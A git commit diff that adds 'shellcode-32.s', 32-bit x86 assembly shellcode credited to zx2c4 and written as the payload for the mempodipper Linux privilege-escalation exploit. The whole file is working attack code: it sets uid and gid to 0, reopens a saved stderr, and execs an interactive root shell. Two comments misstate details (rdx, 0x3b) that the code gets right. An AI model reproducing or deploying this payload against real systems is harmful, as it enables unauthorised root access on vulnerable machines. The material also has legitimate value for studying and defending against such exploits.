aboutsummaryrefslogtreecommitdiffstats
path: root/shellcode-32.s
diff options
context:
space:
mode:
Diffstat (limited to 'shellcode-32.s')
-rw-r--r--shellcode-32.s53
1 files changed, 53 insertions, 0 deletions
diff --git a/shellcode-32.s b/shellcode-32.s
new file mode 100644
index 0000000..d08b93f
--- /dev/null
+++ b/shellcode-32.s
@@ -0,0 +1,53 @@
+BITS 32
+; This shell code sets uid and gid to 0 and execs a shell in interactive mode.
+; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper.
+;
+; by zx2c4
+
+
+;setuid(0)
+xor ebx,ebx
+mov al,0x17
+int 0x80
+;setgid(0)
+xor ebx,ebx
+mov al,0x2e
+int 0x80
+;dup2(6, 2)
+mov bl,0x6
+mov cl,0x2
+mov al,0x3f
+int 0x80
+
+
+
+; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
+xor eax,eax ; eax = 0
+push eax ; push eax
+push 0x68732f6e ; push //bin/sh
+push 0x69622f2f
+mov ebx,esp ; set ebx (arg 1) to top of stack
+
+xor edx,edx ; edx = 0
+mov dx,'-i' ; edx = '-i'
+push edx ; push edx to stack
+mov eax,esp ; set eax to top of stack
+
+xor edx,edx ; edx = 0
+
+; so at this point:
+; ebx is a pointer to '//bin/sh'
+; eax is a pointer to '-i'
+; edx is null
+; since they are all the same size, we'll push them on the stack
+; and then it will be an array:
+push edx ; push edx to stack
+push eax ; push eax to stack
+push ebx ; push ebx to stack
+mov ecx,esp ; set ecx (arg 2) to top of stack
+
+xor edx,edx ; rdx (arg 3) = 0
+
+xor eax,eax
+mov al,0xb ; al = 0x3b, which is the exec call
+int 0x80